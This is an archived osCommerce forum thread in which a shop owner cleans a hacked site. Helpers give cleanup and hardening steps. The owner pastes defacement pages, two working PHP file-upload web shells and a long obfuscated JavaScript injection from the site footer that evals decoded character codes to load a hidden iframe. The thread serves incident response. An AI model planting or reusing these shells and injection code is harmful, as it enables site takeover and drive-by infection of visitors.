Racing Club Posted March 13, 2011 Share Posted March 13, 2011 hello I have a problem. From 1 day to another my web change. Before it worked fine. But now I see this message on the homepage and the admin: homepage: Parse error: syntax error, unexpected '<' in /home/videoclub/public_html/index.php on line 35 admin: Parse error: syntax error, unexpected '<' in /home/videoclub/public_html/admin/index.php on line 26 ---------------------------------------------- Line 35: <! doctype html public "- / / W3C / / DTD HTML 4.01 Transitional / / EN"> Line 26: <! doctype html public "- / / W3C / / DTD HTML 4.01 Transitional / / EN"> Please help. Thanks I use version v2.2RC2a of oscommerce Link to comment Share on other sites More sharing options...
Guest Posted March 13, 2011 Share Posted March 13, 2011 Ariel, check your website for hacker activity. Hackers usually try to insert code at the top of the index.php files. Perhaps you can post the first 30 lines so we can see it. Chris Link to comment Share on other sites More sharing options...
Racing Club Posted March 13, 2011 Author Share Posted March 13, 2011 Thanks for replying index.php of homepage: <?php /* $Id: index.php 1739 2007-12-20 00:52:16Z hpdl $ osCommerce, Open Source E-Commerce Solutions http://www.oscommerce.com Copyright © 2003 osCommerce Released under the GNU General Public License */ require('includes/application_top.php'); // the following cPath references come from application_top.php $category_depth = 'top'; if (isset($cPath) && tep_not_null($cPath)) { $categories_products_query = tep_db_query("select count(*) as total from " . TABLE_PRODUCTS_TO_CATEGORIES . " where categories_id = '" . (int)$current_category_id . "'"); $cateqories_products = tep_db_fetch_array($categories_products_query); if ($cateqories_products['total'] > 0) { $category_depth = 'products'; // display products } else { $category_parent_query = tep_db_query("select count(*) as total from " . TABLE_CATEGORIES . " where parent_id = '" . (int)$current_category_id . "'"); $category_parent = tep_db_fetch_array($category_parent_query); if ($category_parent['total'] > 0) { $category_depth = 'nested'; // navigate through the categories } else { $category_depth = 'products'; // category has no products, but display the 'no products' message } } } require(DIR_WS_LANGUAGES . $language . '/' . FILENAME_DEFAULT); <!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN"> <html <?php echo HTML_PARAMS;> <head> index.php of admin: <?php /* $Id: index.php 1739 2007-12-20 00:52:16Z hpdl $ osCommerce, Open Source E-Commerce Solutions http://www.oscommerce.com Copyright © 2007 osCommerce Released under the GNU General Public License */ require('includes/application_top.php'); $languages = tep_get_languages(); $languages_array = array(); $languages_selected = DEFAULT_LANGUAGE; for ($i = 0, $n = sizeof($languages); $i < $n; $i++) { $languages_array[] = array('id' => $languages[$i]['code'], 'text' => $languages[$i]['name']); if ($languages[$i]['directory'] == $language) { $languages_selected = $languages[$i]['code']; } } <!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN"> <html <?php echo HTML_PARAMS;> <head> Link to comment Share on other sites More sharing options...
Guest Posted March 13, 2011 Share Posted March 13, 2011 Ariel, Are you sure you didn't make recent changes to accommodate additional language support ? In the index.php, this: require(DIR_WS_LANGUAGES . $language . '/' . FILENAME_DEFAULT); <!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN"> <html <?php echo HTML_PARAMS;> <head> Should be this: require(DIR_WS_LANGUAGES . $language . '/' . FILENAME_DEFAULT); ?> <!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN"> <html <?php echo HTML_PARAMS;> <head> NOTE the ?> BEFORE the doctype line ? It is also missing in your /admin/index.php and the language code $languages = tep_get_languages(); $languages_array = array(); $languages_selected = DEFAULT_LANGUAGE; for ($i = 0, $n = sizeof($languages); $i < $n; $i++) { $languages_array[] = array('id' => $languages[$i]['code'], 'text' => $languages[$i]['name']); if ($languages[$i]['directory'] == $language) { $languages_selected = $languages[$i]['code']; } } is not standard in the default download. Chris Link to comment Share on other sites More sharing options...
Racing Club Posted March 13, 2011 Author Share Posted March 13, 2011 I didn´t make any changes recently and I don´t touch anything. I try what you said and didn´t work. Thanks Link to comment Share on other sites More sharing options...
Guest Posted March 13, 2011 Share Posted March 13, 2011 Ariel, This is the first 37 lines from a default index.php file. Try it. Remember to back up before making any changes. <?php /* $Id: index.php 1739 2007-12-20 00:52:16Z hpdl $ osCommerce, Open Source E-Commerce Solutions http://www.oscommerce.com Copyright © 2003 osCommerce Released under the GNU General Public License */ require('includes/application_top.php'); // the following cPath references come from application_top.php $category_depth = 'top'; if (isset($cPath) && tep_not_null($cPath)) { $categories_products_query = tep_db_query("select count(*) as total from " . TABLE_PRODUCTS_TO_CATEGORIES . " where categories_id = '" . (int)$current_category_id . "'"); $cateqories_products = tep_db_fetch_array($categories_products_query); if ($cateqories_products['total'] > 0) { $category_depth = 'products'; // display products } else { $category_parent_query = tep_db_query("select count(*) as total from " . TABLE_CATEGORIES . " where parent_id = '" . (int)$current_category_id . "'"); $category_parent = tep_db_fetch_array($category_parent_query); if ($category_parent['total'] > 0) { $category_depth = 'nested'; // navigate through the categories } else { $category_depth = 'products'; // category has no products, but display the 'no products' message } } } require(DIR_WS_LANGUAGES . $language . '/' . FILENAME_DEFAULT); ?> <!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN"> <html <?php echo HTML_PARAMS; ?>> <head> Chris Link to comment Share on other sites More sharing options...
Racing Club Posted March 13, 2011 Author Share Posted March 13, 2011 DunWeb, I have a backup of my website, but I wanted to see if someone had hacked my website Link to comment Share on other sites More sharing options...
Guest Posted March 13, 2011 Share Posted March 13, 2011 It is hard to say if the site has been compromised based on the little information you have given and without seeing the URL. However, if you did not make the changes to the index.php and /admin/index.php then there has been some unauthorized activity. Chris Link to comment Share on other sites More sharing options...
Racing Club Posted March 13, 2011 Author Share Posted March 13, 2011 Url: www.videoclublasflores.com.ar Thanks for all Link to comment Share on other sites More sharing options...
Racing Club Posted March 14, 2011 Author Share Posted March 14, 2011 web page remains the same, I do not know what to do Link to comment Share on other sites More sharing options...
germ Posted March 14, 2011 Share Posted March 14, 2011 You have hack files all over in the images folder. :o Visit the link below: How to Secure Your Site Pay close attention to "SECURING THE ADMIN" - Yours is vulnerable. If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you. "Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice." - Me - "Headers already sent" - The definitive help "Cannot redeclare ..." - How to find/fix it SSL Implementation Help Like this post? "Like" it again over there > Link to comment Share on other sites More sharing options...
Racing Club Posted March 14, 2011 Author Share Posted March 14, 2011 Recently I started to see the images folder and I found this (as you are saying): ina.htm: HACKED BY <h4> <center> kaMtiEz </ h4> </ center> <center> <h4> <br> INDONESIANCODER TEAM @ 2010 </ h4> </ center> indonesia.htm: <html><head> <title>Hacker Indonesia</title><style type="text/css"> html, body { color: white; background-color: #000080; } a { background-color: transparent; color: #ffffff; } #p404 { position: absolute; top: 20%; left: 0px; width: 100%; height: 1px; overflow: visible; visibility: visible; display: block; } #content { margin-left: -320px; position: absolute; top: -100px; left: 50%; width: 640px; height: 200px; visibility: visible; } #errormessage { font: 50px garamond; line-height: 200%; text-align: center; } #title, #footer { text-align: center; } #title span { background-color: #c0c0c0; color: #000080; } </style><meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"></head><body> <div id="p404"> <div id="content"> <div id="errormessage"> <p>Hacked by Hmei7</p> </p> </div> </div> </div> </body></html> kacuk.php: ==kacuk <?php echo '<br><br>'.php_uname().'<br>'; echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">'; echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>'; if( $_POST['_upl'] == "Upload" ) { if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo 'File Uploaded!<br><br>'; } else { echo 'File Upload, Failed!<br><br>'; } } ?> == x.htm: <b><font size="5">by iskorpitx</font></b> (I'm not sure) put.php: <?php echo '<b>The KabuS<br><br>'.php_uname().'<br></b>'; echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">'; echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>'; if( $_POST['_upl'] == "Upload" ) { if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload Success !!!</b><br><br>'; } else { echo '<b>Upload Fail !!!</b><br><br>'; } } ?> ---------------------------------- I'll keep the advice you gave me on "Securing the ADMIN. but Can I get my website as it was before? What should I do? Link to comment Share on other sites More sharing options...
Guest Posted March 14, 2011 Share Posted March 14, 2011 Ariel, Follow these steps to clean and secure your website: 1) Lock down your site by using an .htaccess password so your customers are not attacked by the hackers code. 2) FTP all of the files to your local machine and use a program like WinGrep to identify and remove all malicious and anomalous files containing hacker code. Look for keywords such as 'base64','eval','decode'. 3) Delete the files on your hosting account before uploading the clean files. 4) FTP the clean files back to your hosting account and read and implement the security patches and contributions found in these two threads. Admin Security and Website Security. 5) Change all of your passwords: FTP, CPANEL, STORE ADMIN and DATABASE 6) Make sure File and Directory Permissions are set correctly. Directories no higher than 755, Files no higher than 644 and the TWO configure.php files no higher than 444 7) If your site has been 'black listed' as an attack site by Google, then log into Google Webmaster Tools and submit the site to be re-indexed and verified to be removed from the 'black list' 8) Remove the .htaccess password protection so your customers can resume making purchases from your website. 9) Monitor your website using the newly installed contributions to prevent future hacker attacks. 10) [Removed]. Chris Link to comment Share on other sites More sharing options...
Racing Club Posted March 15, 2011 Author Share Posted March 15, 2011 I delete this files from the images folder: ina.htm indonesia.htm kacuk.php x.htm put.php In point 2 where you asked me to find these keywords: eval base64 decode At those words found in a few files called: googleff7fe2850f15ebd7.php googlebc44d7671aae3b3e.php google7a14fb0c01e4e5d1.php What should I do? Link to comment Share on other sites More sharing options...
germ Posted March 15, 2011 Share Posted March 15, 2011 Those are all hack files. It's not normal on 99.99% (or more) installs to have ANY php files in the images folder. Unless you purposely put a php file in the images folder and you know exactly what it does I'd remove and and all php files from the images folder. If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you. "Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice." - Me - "Headers already sent" - The definitive help "Cannot redeclare ..." - How to find/fix it SSL Implementation Help Like this post? "Like" it again over there > Link to comment Share on other sites More sharing options...
Guest Posted March 15, 2011 Share Posted March 15, 2011 Jan, I see you edited #13 post. Please explain where in the forum policies it says I can not invite other members to PM me for additional help ? I have read the forum policies AGAIN, and could not find anything to suggest that I have broken any rules. For the record, here is #10 on the list again: 10) If you feel you can not perform any of the above steps, PM me for help, because if you miss any of these steps your site may remain accessible to the hacker. I welcome your response here in the forum, so everyone can see it. Chris Link to comment Share on other sites More sharing options...
Racing Club Posted March 15, 2011 Author Share Posted March 15, 2011 I delete these files and tomorrow I will download version 2.2 for correction of the two index.php Thanks I hope it works Link to comment Share on other sites More sharing options...
Racing Club Posted March 16, 2011 Author Share Posted March 16, 2011 At the footer of the index.php I found this: <script>function createCSS(selector,declaration){var ua=navigator.userAgent.toLowerCase();var isIE=(/msie/.test(ua))&&!(/opera/.test(ua))&&(/win/.test(ua));var style_node=document.createElement("style");if(!isIE)style_node.innerHTML=selector+" {"+declaration+"}";document.getElementsByTagName("head")[0].appendChild(style_node);if(isIE&&document.styleSheets&&document.styleSheets.length>0){var last_style_node=document.styleSheets[document.styleSheets.length-1];if(typeof(last_style_node.addRule)=="object")last_style_node.addRule(selector,declaration);}};createCSS("#va","background:url(data:,String.fromCharCode)");var ucyq=null;var r=document.styleSheets;for(var i=0;i<r.length;i++){try{var vpm=r.cssRules||r.rules;for(var lqf=0;lqf<vpm.length;lqf++){var gl=vpm.item?vpm.item(lqf):vpm[lqf];if(!gl.selectorText.match(/#va/))continue;qq=(gl.cssText)?gl.cssText:gl.style.cssText;ucyq=qq.match(/(S[^")]+)/)[1];zio=gl.selectorText.substr(1);};}catch(e){};}oe=new Date(2010,11,3,2,21,4);t=oe.getSeconds();var vo=[36/t,36/t,420/t,408/t,128/t,160/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,412/t,404/t,464/t,276/t,432/t,404/t,436/t,404/t,440/t,464/t,460/t,264/t,484/t,336/t,388/t,412/t,312/t,388/t,436/t,404/t,160/t,156/t,392/t,444/t,400/t,484/t,156/t,164/t,364/t,192/t,372/t,164/t,492/t,52/t,36/t,36/t,36/t,420/t,408/t,456/t,388/t,436/t,404/t,456/t,160/t,164/t,236/t,52/t,36/t,36/t,500/t,128/t,404/t,432/t,460/t,404/t,128/t,492/t,52/t,36/t,36/t,36/t,472/t,388/t,456/t,128/t,392/t,400/t,484/t,128/t,244/t,128/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,396/t,456/t,404/t,388/t,464/t,404/t,276/t,432/t,404/t,436/t,404/t,440/t,464/t,160/t,136/t,392/t,444/t,400/t,484/t,136/t,164/t,236/t,52/t,36/t,36/t,36/t,464/t,456/t,484/t,128/t,492/t,52/t,36/t,36/t,36/t,36/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,388/t,448/t,448/t,404/t,440/t,400/t,268/t,416/t,420/t,432/t,400/t,160/t,392/t,400/t,484/t,164/t,236/t,52/t,36/t,36/t,36/t,500/t,128/t,396/t,388/t,464/t,396/t,416/t,128/t,160/t,404/t,164/t,128/t,492/t,52/t,36/t,36/t,36/t,36/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,392/t,444/t,400/t,484/t,128/t,244/t,128/t,392/t,400/t,484/t,236/t,52/t,36/t,36/t,36/t,500/t,52/t,36/t,36/t,36/t,420/t,408/t,128/t,160/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,412/t,404/t,464/t,276/t,432/t,404/t,436/t,404/t,440/t,464/t,460/t,264/t,484/t,336/t,388/t,412/t,312/t,388/t,436/t,404/t,160/t,156/t,392/t,444/t,400/t,484/t,156/t,164/t,364/t,192/t,372/t,164/t,492/t,52/t,36/t,36/t,36/t,36/t,420/t,408/t,456/t,388/t,436/t,404/t,456/t,160/t,164/t,236/t,52/t,36/t,36/t,36/t,500/t,128/t,404/t,432/t,460/t,404/t,128/t,492/t,52/t,36/t,36/t,36/t,36/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,476/t,456/t,420/t,464/t,404/t,160/t,136/t,240/t,420/t,408/t,456/t,388/t,436/t,404/t,128/t,460/t,456/t,396/t,244/t,156/t,416/t,464/t,464/t,448/t,232/t,188/t,188/t,228/t,208/t,184/t,216/t,204/t,184/t,200/t,208/t,208/t,184/t,212/t,220/t,188/t,476/t,204/t,396/t,188/t,156/t,128/t,476/t,420/t,400/t,464/t,416/t,244/t,156/t,196/t,192/t,156/t,128/t,416/t,404/t,420/t,412/t,416/t,464/t,244/t,156/t,196/t,192/t,156/t,128/t,460/t,464/t,484/t,432/t,404/t,244/t,156/t,472/t,420/t,460/t,420/t,392/t,420/t,432/t,420/t,464/t,484/t,232/t,416/t,420/t,400/t,400/t,404/t,440/t,236/t,448/t,444/t,460/t,420/t,464/t,420/t,444/t,440/t,232/t,388/t,392/t,460/t,444/t,432/t,468/t,464/t,404/t,236/t,432/t,404/t,408/t,464/t,232/t,192/t,236/t,464/t,444/t,448/t,232/t,192/t,236/t,156/t,248/t,240/t,188/t,420/t,408/t,456/t,388/t,436/t,404/t,248/t,136/t,164/t,236/t,52/t,36/t,36/t,36/t,500/t,52/t,36/t,36/t,500/t,52/t,36/t,36/t,408/t,468/t,440/t,396/t,464/t,420/t,444/t,440/t,128/t,420/t,408/t,456/t,388/t,436/t,404/t,456/t,160/t,164/t,492/t,52/t,36/t,36/t,36/t,472/t,388/t,456/t,128/t,408/t,128/t,244/t,128/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,396/t,456/t,404/t,388/t,464/t,404/t,276/t,432/t,404/t,436/t,404/t,440/t,464/t,160/t,156/t,420/t,408/t,456/t,388/t,436/t,404/t,156/t,164/t,236/t,408/t,184/t,460/t,404/t,464/t,260/t,464/t,464/t,456/t,420/t,392/t,468/t,464/t,404/t,160/t,156/t,460/t,456/t,396/t,156/t,176/t,156/t,416/t,464/t,464/t,448/t,232/t,188/t,188/t,228/t,208/t,184/t,216/t,204/t,184/t,200/t,208/t,208/t,184/t,212/t,220/t,188/t,476/t,204/t,396/t,188/t,156/t,164/t,236/t,408/t,184/t,460/t,464/t,484/t,432/t,404/t,184/t,472/t,420/t,460/t,420/t,392/t,420/t,432/t,420/t,464/t,484/t,244/t,156/t,416/t,420/t,400/t,400/t,404/t,440/t,156/t,236/t,408/t,184/t,460/t,464/t,484/t,432/t,404/t,184/t,448/t,444/t,460/t,420/t,464/t,420/t,444/t,440/t,244/t,156/t,388/t,392/t,460/t,444/t,432/t,468/t,464/t,404/t,156/t,236/t,408/t,184/t,460/t,464/t,484/t,432/t,404/t,184/t,432/t,404/t,408/t,464/t,244/t,156/t,192/t,156/t,236/t,408/t,184/t,460/t,464/t,484/t,432/t,404/t,184/t,464/t,444/t,448/t,244/t,156/t,192/t,156/t,236/t,408/t,184/t,460/t,404/t,464/t,260/t,464/t,464/t,456/t,420/t,392/t,468/t,464/t,404/t,160/t,156/t,476/t,420/t,400/t,464/t,416/t,156/t,176/t,156/t,196/t,192/t,156/t,164/t,236/t,408/t,184/t,460/t,404/t,464/t,260/t,464/t,464/t,456/t,420/t,392/t,468/t,464/t,404/t,160/t,156/t,416/t,404/t,420/t,412/t,416/t,464/t,156/t,176/t,156/t,196/t,192/t,156/t,164/t,236/t,52/t,36/t,36/t,36/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,412/t,404/t,464/t,276/t,432/t,404/t,436/t,404/t,440/t,464/t,460/t,264/t,484/t,336/t,388/t,412/t,312/t,388/t,436/t,404/t,160/t,156/t,392/t,444/t,400/t,484/t,156/t,164/t,364/t,192/t,372/t,184/t,388/t,448/t,448/t,404/t,440/t,400/t,268/t,416/t,420/t,432/t,400/t,160/t,408/t,164/t,236/t,52/t,36/t,36/t,500/t];var fme="";var g=function(){return this;}();tevq=g["e"+zio+"l"];var cet="";hj=tevq(ucyq);for(var i=0;i<vo.length;i++){aig=tevq(vo);cet+=hj(aig);}tevq(cet);</script> I already removed and now I'm adding this: ?> because it is missing several lines. I'll report how I progress. Thanks! I was slow to respond because I spent the whole afternoon removing a virus in my computer Link to comment Share on other sites More sharing options...
Racing Club Posted March 16, 2011 Author Share Posted March 16, 2011 I am done! Now when I go to my website or the admin page goes blank. I see when loading Internet Explorer other addresses down Thanks! Link to comment Share on other sites More sharing options...
Racing Club Posted March 17, 2011 Author Share Posted March 17, 2011 please help! Thanks! Link to comment Share on other sites More sharing options...
Guest Posted March 17, 2011 Share Posted March 17, 2011 Ariel, If you are seeing other URL's in the progress bar on the footer of your browser, this means you have not cleaned the site entirely. If your Admin page is blank, then there is a code error, possibly whitespace before or after the opening or closing PHP tags. Chris Link to comment Share on other sites More sharing options...
Racing Club Posted March 17, 2011 Author Share Posted March 17, 2011 Chris, Look at the footer of my browser: What should I do? Link to comment Share on other sites More sharing options...
Racing Club Posted March 17, 2011 Author Share Posted March 17, 2011 That only happens when I open my website with Internet Explorer with Mozilla Firefox does not happen. Someone could go to my website and see if the same please Thanks Link to comment Share on other sites More sharing options...
Guest Posted March 17, 2011 Share Posted March 17, 2011 Ariel, I am not seeing that using IE 8 or FF 3.6. I suggest you clear your temp files and cookies and reload your browser again. Chris Link to comment Share on other sites More sharing options...
Racing Club Posted March 17, 2011 Author Share Posted March 17, 2011 Ariel, I am not seeing that using IE 8 or FF 3.6. I suggest you clear your temp files and cookies and reload your browser again. Chris What do you see? because I delete temp files and cookies and I keep seeing the same thing Thanks! Link to comment Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.